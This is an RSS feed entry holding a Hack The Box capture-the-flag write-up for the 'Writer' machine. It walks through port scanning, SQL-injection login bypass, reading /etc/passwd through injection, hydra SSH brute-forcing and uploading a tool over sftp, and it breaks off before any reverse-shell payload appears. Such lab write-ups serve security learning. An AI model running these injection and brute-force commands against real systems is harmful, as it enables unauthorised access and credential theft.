<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Berkcan Uçan</title>
    <description>The latest articles on DEV Community by Berkcan Uçan (@alcadramin).</description>
    <link>https://dev.to/alcadramin</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F772613%2Fa869a35c-5d10-4ae6-b953-930de5b82580.png</url>
      <title>DEV Community: Berkcan Uçan</title>
      <link>https://dev.to/alcadramin</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/alcadramin"/>
    <language>en</language>
    <item>
      <title>Let's Hack this Box - Writer (Writeup)</title>
      <dc:creator>Berkcan Uçan</dc:creator>
      <pubDate>Sat, 11 Dec 2021 13:23:00 +0000</pubDate>
      <link>https://dev.to/alcadramin/lets-hack-this-box-writer-writeup-5a30</link>
      <guid>https://dev.to/alcadramin/lets-hack-this-box-writer-writeup-5a30</guid>
      <description>&lt;p&gt;Hello guys! This is my first post here. I am planning to post &lt;strong&gt;Hack the Box&lt;/strong&gt; writeups, Web Dev logs and also my Kaggle journeys. Today I am going to work on &lt;a href="https://app.hackthebox.com/machines/361"&gt;Writer&lt;/a&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Before start, please try to pawn this machine by &lt;strong&gt;yourself&lt;/strong&gt; first.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;"Writer" is rated as Medium difficulty (Linux) machine, we'll see how it goes! I usually start with nmap to see what's going on.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;nmap&lt;/strong&gt; is a must have tool to find open ports, services, which OS host uses etc. &lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  nmap scan
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;alcadramin@archlinux ➜ ~  &lt;span class="nb"&gt;sudo &lt;/span&gt;nmap &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-sS&lt;/span&gt; &lt;span class="nt"&gt;-A&lt;/span&gt; 10.10.11.101
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Starting Nmap 7.92 &lt;span class="o"&gt;(&lt;/span&gt; https://nmap.org &lt;span class="o"&gt;)&lt;/span&gt; at 2021-12-03 07:00 +03
Stats: 0:00:24 elapsed&lt;span class="p"&gt;;&lt;/span&gt; 0 hosts completed &lt;span class="o"&gt;(&lt;/span&gt;1 up&lt;span class="o"&gt;)&lt;/span&gt;, 1 undergoing Traceroute
Traceroute Timing: About 32.26% &lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; ETC: 07:00 &lt;span class="o"&gt;(&lt;/span&gt;0:00:00 remaining&lt;span class="o"&gt;)&lt;/span&gt;
Nmap scan report &lt;span class="k"&gt;for &lt;/span&gt;10.10.11.101
Host is up &lt;span class="o"&gt;(&lt;/span&gt;0.075s latency&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;
Not shown: 996 closed tcp ports &lt;span class="o"&gt;(&lt;/span&gt;reset&lt;span class="o"&gt;)&lt;/span&gt;
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu Linux&lt;span class="p"&gt;;&lt;/span&gt; protocol 2.0&lt;span class="o"&gt;)&lt;/span&gt;
| ssh-hostkey: 
|   3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d &lt;span class="o"&gt;(&lt;/span&gt;RSA&lt;span class="o"&gt;)&lt;/span&gt;
|   256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 &lt;span class="o"&gt;(&lt;/span&gt;ECDSA&lt;span class="o"&gt;)&lt;/span&gt;
|_  256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d &lt;span class="o"&gt;(&lt;/span&gt;ED25519&lt;span class="o"&gt;)&lt;/span&gt;
80/tcp  open  http        Apache httpd 2.4.41 &lt;span class="o"&gt;((&lt;/span&gt;Ubuntu&lt;span class="o"&gt;))&lt;/span&gt;
|_http-server-header: Apache/2.4.41 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu&lt;span class="o"&gt;)&lt;/span&gt;
|_http-title: Story Bank | Writer.HTB
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
No exact OS matches &lt;span class="k"&gt;for &lt;/span&gt;host &lt;span class="o"&gt;(&lt;/span&gt;If you know what OS is running on it, see https://nmap.org/submit/ &lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;
TCP/IP fingerprint:
OS:SCAN&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;V&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;7.92%E&lt;span class="o"&gt;=&lt;/span&gt;4%D&lt;span class="o"&gt;=&lt;/span&gt;12/3%OT&lt;span class="o"&gt;=&lt;/span&gt;22%CT&lt;span class="o"&gt;=&lt;/span&gt;1%CU&lt;span class="o"&gt;=&lt;/span&gt;42753%PV&lt;span class="o"&gt;=&lt;/span&gt;Y%DS&lt;span class="o"&gt;=&lt;/span&gt;2%DC&lt;span class="o"&gt;=&lt;/span&gt;T%G&lt;span class="o"&gt;=&lt;/span&gt;Y%TM&lt;span class="o"&gt;=&lt;/span&gt;61A9966
OS:6%P&lt;span class="o"&gt;=&lt;/span&gt;x86_64-pc-linux-gnu&lt;span class="o"&gt;)&lt;/span&gt;SEQ&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;SP&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;105%GCD&lt;span class="o"&gt;=&lt;/span&gt;1%ISR&lt;span class="o"&gt;=&lt;/span&gt;10A%TI&lt;span class="o"&gt;=&lt;/span&gt;Z%CI&lt;span class="o"&gt;=&lt;/span&gt;Z%II&lt;span class="o"&gt;=&lt;/span&gt;I%TS&lt;span class="o"&gt;=&lt;/span&gt;A&lt;span class="o"&gt;)&lt;/span&gt;OPS
OS:&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;O1&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;M54DST11NW7%O2&lt;span class="o"&gt;=&lt;/span&gt;M54DST11NW7%O3&lt;span class="o"&gt;=&lt;/span&gt;M54DNNT11NW7%O4&lt;span class="o"&gt;=&lt;/span&gt;M54DST11NW7%O5&lt;span class="o"&gt;=&lt;/span&gt;M54DST1
OS:1NW7%O6&lt;span class="o"&gt;=&lt;/span&gt;M54DST11&lt;span class="o"&gt;)&lt;/span&gt;WIN&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;W1&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;FE88%W2&lt;span class="o"&gt;=&lt;/span&gt;FE88%W3&lt;span class="o"&gt;=&lt;/span&gt;FE88%W4&lt;span class="o"&gt;=&lt;/span&gt;FE88%W5&lt;span class="o"&gt;=&lt;/span&gt;FE88%W6&lt;span class="o"&gt;=&lt;/span&gt;FE88&lt;span class="o"&gt;)&lt;/span&gt;ECN
OS:&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;R&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Y%DF&lt;span class="o"&gt;=&lt;/span&gt;Y%T&lt;span class="o"&gt;=&lt;/span&gt;40%W&lt;span class="o"&gt;=&lt;/span&gt;FAF0%O&lt;span class="o"&gt;=&lt;/span&gt;M54DNNSNW7%CC&lt;span class="o"&gt;=&lt;/span&gt;Y%Q&lt;span class="o"&gt;=)&lt;/span&gt;T1&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;R&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Y%DF&lt;span class="o"&gt;=&lt;/span&gt;Y%T&lt;span class="o"&gt;=&lt;/span&gt;40%S&lt;span class="o"&gt;=&lt;/span&gt;O%A&lt;span class="o"&gt;=&lt;/span&gt;S+%F&lt;span class="o"&gt;=&lt;/span&gt;A
OS:S%RD&lt;span class="o"&gt;=&lt;/span&gt;0%Q&lt;span class="o"&gt;=)&lt;/span&gt;T2&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;R&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;N&lt;span class="o"&gt;)&lt;/span&gt;T3&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;R&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;N&lt;span class="o"&gt;)&lt;/span&gt;T4&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;R&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Y%DF&lt;span class="o"&gt;=&lt;/span&gt;Y%T&lt;span class="o"&gt;=&lt;/span&gt;40%W&lt;span class="o"&gt;=&lt;/span&gt;0%S&lt;span class="o"&gt;=&lt;/span&gt;A%A&lt;span class="o"&gt;=&lt;/span&gt;Z%F&lt;span class="o"&gt;=&lt;/span&gt;R%O&lt;span class="o"&gt;=&lt;/span&gt;%RD&lt;span class="o"&gt;=&lt;/span&gt;0%Q&lt;span class="o"&gt;=)&lt;/span&gt;T5&lt;span class="o"&gt;(&lt;/span&gt;R
OS:&lt;span class="o"&gt;=&lt;/span&gt;Y%DF&lt;span class="o"&gt;=&lt;/span&gt;Y%T&lt;span class="o"&gt;=&lt;/span&gt;40%W&lt;span class="o"&gt;=&lt;/span&gt;0%S&lt;span class="o"&gt;=&lt;/span&gt;Z%A&lt;span class="o"&gt;=&lt;/span&gt;S+%F&lt;span class="o"&gt;=&lt;/span&gt;AR%O&lt;span class="o"&gt;=&lt;/span&gt;%RD&lt;span class="o"&gt;=&lt;/span&gt;0%Q&lt;span class="o"&gt;=)&lt;/span&gt;T6&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;R&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Y%DF&lt;span class="o"&gt;=&lt;/span&gt;Y%T&lt;span class="o"&gt;=&lt;/span&gt;40%W&lt;span class="o"&gt;=&lt;/span&gt;0%S&lt;span class="o"&gt;=&lt;/span&gt;A%A&lt;span class="o"&gt;=&lt;/span&gt;Z%F
OS:&lt;span class="o"&gt;=&lt;/span&gt;R%O&lt;span class="o"&gt;=&lt;/span&gt;%RD&lt;span class="o"&gt;=&lt;/span&gt;0%Q&lt;span class="o"&gt;=)&lt;/span&gt;T7&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;R&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Y%DF&lt;span class="o"&gt;=&lt;/span&gt;Y%T&lt;span class="o"&gt;=&lt;/span&gt;40%W&lt;span class="o"&gt;=&lt;/span&gt;0%S&lt;span class="o"&gt;=&lt;/span&gt;Z%A&lt;span class="o"&gt;=&lt;/span&gt;S+%F&lt;span class="o"&gt;=&lt;/span&gt;AR%O&lt;span class="o"&gt;=&lt;/span&gt;%RD&lt;span class="o"&gt;=&lt;/span&gt;0%Q&lt;span class="o"&gt;=)&lt;/span&gt;U1&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;R&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Y%DF&lt;span class="o"&gt;=&lt;/span&gt;N%
OS:T&lt;span class="o"&gt;=&lt;/span&gt;40%IPL&lt;span class="o"&gt;=&lt;/span&gt;164%UN&lt;span class="o"&gt;=&lt;/span&gt;0%RIPL&lt;span class="o"&gt;=&lt;/span&gt;G%RID&lt;span class="o"&gt;=&lt;/span&gt;G%RIPCK&lt;span class="o"&gt;=&lt;/span&gt;G%RUCK&lt;span class="o"&gt;=&lt;/span&gt;G%RUD&lt;span class="o"&gt;=&lt;/span&gt;G&lt;span class="o"&gt;)&lt;/span&gt;IE&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;R&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Y%DFI&lt;span class="o"&gt;=&lt;/span&gt;N%T&lt;span class="o"&gt;=&lt;/span&gt;40%CD
OS:&lt;span class="o"&gt;=&lt;/span&gt;S&lt;span class="o"&gt;)&lt;/span&gt;

Network Distance: 2 hops
Service Info: OS: Linux&lt;span class="p"&gt;;&lt;/span&gt; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 15m52s
|_nbstat: NetBIOS name: WRITER, NetBIOS user: &amp;lt;unknown&amp;gt;, NetBIOS MAC: &amp;lt;unknown&amp;gt; &lt;span class="o"&gt;(&lt;/span&gt;unknown&lt;span class="o"&gt;)&lt;/span&gt;
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   &lt;span class="nb"&gt;date&lt;/span&gt;: 2021-12-03T04:16:28
|_  start_date: N/A

TRACEROUTE &lt;span class="o"&gt;(&lt;/span&gt;using port 3306/tcp&lt;span class="o"&gt;)&lt;/span&gt;
HOP RTT      ADDRESS
1   73.43 ms 10.10.14.1
2   73.95 ms 10.10.11.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ &lt;span class="nb"&gt;.&lt;/span&gt;
Nmap &lt;span class="k"&gt;done&lt;/span&gt;: 1 IP address &lt;span class="o"&gt;(&lt;/span&gt;1 host up&lt;span class="o"&gt;)&lt;/span&gt; scanned &lt;span class="k"&gt;in &lt;/span&gt;27.84 seconds
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We can clearly see that we've a HTTP server let's check what's inside 👀.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--dJzoJpqq--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/1382ee9f294d" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--dJzoJpqq--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/1382ee9f294d" alt="Writer Website" width="880" height="429"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Finding URI's with gobuster
&lt;/h2&gt;

&lt;p&gt;Nothing interesting, let's find URI's (directories) with &lt;code&gt;gobuster&lt;/code&gt;, which usually leads us to some goodies.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/OJ/gobuster"&gt;Gobuster&lt;/a&gt; is a tool used to brute-force:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;URIs (directories and files) in web sites.&lt;/li&gt;
&lt;li&gt;DNS subdomains (with wildcard support).&lt;/li&gt;
&lt;li&gt;Virtual Host names on target web servers.&lt;/li&gt;
&lt;li&gt;Open Amazon S3 buckets
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;alcadramin@archlinux ➜ wordlists  gobuster &lt;span class="nb"&gt;dir&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; 10.10.11.101 &lt;span class="nt"&gt;-w&lt;/span&gt; directory-list-2.3-small.txt 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;===============================================================&lt;/span&gt;
Gobuster v3.1.0
by OJ Reeves &lt;span class="o"&gt;(&lt;/span&gt;@TheColonial&lt;span class="o"&gt;)&lt;/span&gt; &amp;amp; Christian Mehlmauer &lt;span class="o"&gt;(&lt;/span&gt;@firefart&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;===============================================================&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] Url:                     http://10.10.11.101
&lt;span class="o"&gt;[&lt;/span&gt;+] Method:                  GET
&lt;span class="o"&gt;[&lt;/span&gt;+] Threads:                 10
&lt;span class="o"&gt;[&lt;/span&gt;+] Wordlist:                directory-list-2.3-small.txt
&lt;span class="o"&gt;[&lt;/span&gt;+] Negative Status codes:   404
&lt;span class="o"&gt;[&lt;/span&gt;+] User Agent:              gobuster/3.1.0
&lt;span class="o"&gt;[&lt;/span&gt;+] Timeout:                 10s
&lt;span class="o"&gt;===============================================================&lt;/span&gt;
2021/12/03 07:22:14 Starting gobuster &lt;span class="k"&gt;in &lt;/span&gt;directory enumeration mode
&lt;span class="o"&gt;===============================================================&lt;/span&gt;
/contact              &lt;span class="o"&gt;(&lt;/span&gt;Status: 200&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;Size: 4905]
/about                &lt;span class="o"&gt;(&lt;/span&gt;Status: 200&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;Size: 3522]
/static               &lt;span class="o"&gt;(&lt;/span&gt;Status: 301&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;Size: 313] &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="nt"&gt;--&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; http://10.10.11.101/static/]
/logout               &lt;span class="o"&gt;(&lt;/span&gt;Status: 302&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;Size: 208] &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="nt"&gt;--&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; http://10.10.11.101/]       
/dashboard            &lt;span class="o"&gt;(&lt;/span&gt;Status: 302&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;Size: 208] &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="nt"&gt;--&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; http://10.10.11.101/]       
/administrative       &lt;span class="o"&gt;(&lt;/span&gt;Status: 200&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;Size: 1443]                                 

&lt;span class="o"&gt;===============================================================&lt;/span&gt;
2021/12/03 07:33:27 Finished
&lt;span class="o"&gt;===============================================================&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;administrative&lt;/code&gt; seem's interesting.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--t8QInhcl--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/612780d908ce" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--t8QInhcl--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/612780d908ce" alt="Administrative Page" width="880" height="426"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We've a good old login form, we can check if it's vulnerable to SQL injections, request capturing etc. Let's take a look with &lt;strong&gt;Burp Suite&lt;/strong&gt;!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s---21QgMWf--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/555050a39b7e" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s---21QgMWf--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/555050a39b7e" alt="Burp POST" width="880" height="480"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  SQL Injection
&lt;/h2&gt;

&lt;p&gt;Hmm, I've tried weak passwords etc. nothing works, let's try with UNION which is a common SQL vulnerability.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--6tRZnvwo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/f96eb1773264" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--6tRZnvwo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/f96eb1773264" alt="Burp SQL Query" width="880" height="480"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Yay! 🎉 It is vulnerable to SQL injections. I'm just gonna try this request with &lt;code&gt;sqlmap&lt;/code&gt; as well. PS: Just copy the request from Burp and save it to a file then pass it to &lt;code&gt;sqlmap&lt;/code&gt; with &lt;code&gt;-r&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;alcadramin@archlinux ➜ Writer  sqlmap &lt;span class="nt"&gt;-r&lt;/span&gt; request 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--TeBTFzjw--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/61f2a530a647" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--TeBTFzjw--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/61f2a530a647" alt="sqlmap" width="880" height="289"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Yep it's very clear now, let's continue with Burp.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--NVVXHgvf--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/d295fabeabdf" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--NVVXHgvf--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/d295fabeabdf" alt="Burp Injection Success" width="880" height="479"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--uJTNKD3R--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/b9880a17c8ed" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--uJTNKD3R--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/b9880a17c8ed" alt="Burp Injection Success Page Render" width="880" height="960"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We're in. I am going to login with &lt;code&gt;admin' ;**^&lt;/code&gt; query. I've checked dashboard and found we can try to upload image and try to get shell however since we can SQL inject, I'm gonna find users and try to brute-force ssh.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--3F5KRVXD--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/7215a876b6c9" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--3F5KRVXD--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/7215a876b6c9" alt="Dashboard" width="880" height="687"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So I've just quickly writed down an injection (you can see the original one in sqlmap screenshot) to get &lt;code&gt;/etc/passwd&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--a1Y7i7TD--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/82ff1bd063a7" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--a1Y7i7TD--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/82ff1bd063a7" alt="Burp Injection passwd" width="880" height="479"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can see our users!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--qvpF85n2--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/c16e65cf81a7" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--qvpF85n2--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/c16e65cf81a7" alt="Burp Injection passwd 2" width="880" height="959"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  SSH Brute-force
&lt;/h2&gt;

&lt;p&gt;We've &lt;code&gt;kyle&lt;/code&gt; and &lt;code&gt;john&lt;/code&gt;, let's try to brute-force &lt;code&gt;kayle&lt;/code&gt; with &lt;code&gt;hydra&lt;/code&gt;. (I've tried &lt;code&gt;john&lt;/code&gt; as well and waited long time couldn't crack it, so gonna continue with &lt;code&gt;kyle&lt;/code&gt;)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kyle:x:1000:1000:Kyle Travis:/home/kyle:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;salcadramin@archlinux ➜ Writer  sudo hydra -l kyle -P ~/pwn/wordlists/rockyou.txt ssh://10.10.11.101 -VV -f -t 60
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Not so long after, we've found their password!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--LAqpKUFV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/286b8f8d2eb3" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--LAqpKUFV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/286b8f8d2eb3" alt="hydra" width="880" height="80"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And let's connect with ssh! (Someone was already here)&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Kj6Lx-lu--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/15461553472e" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Kj6Lx-lu--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/15461553472e" alt="shell 1" width="880" height="219"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Let's check the ports see if we can find something vulnerable.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--CcUrf95f--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/c6c486f45514" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--CcUrf95f--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn.berkcan.me/v1/img/c6c486f45514" alt="netstat" width="880" height="310"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can get our user hash now, unfortunately &lt;code&gt;kyle&lt;/code&gt; doesn't have sudo access so we'll try to reverse shell to &lt;code&gt;john&lt;/code&gt; with SMTP. (No suprise 👀)&lt;/p&gt;

&lt;p&gt;After some research I've come accross with this repository, which basically allows you to remap ports to desired one : &lt;a href="https://github.com/cw1997/NATBypass"&gt;https://github.com/cw1997/NATBypass&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I'm going to compile it and upload to &lt;code&gt;kyle&lt;/code&gt; with sftp.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;alcadramin@archlinux ➜ ~  sftp kyle@10.10.11.101
kyle@10.10.11.101&lt;span class="s1"&gt;'s password: 
Connected to 10.10.11.101.
sftp&amp;gt; put /home/alcadramin/pwn/natbypass
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Generate the reverse shell payload with base64.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
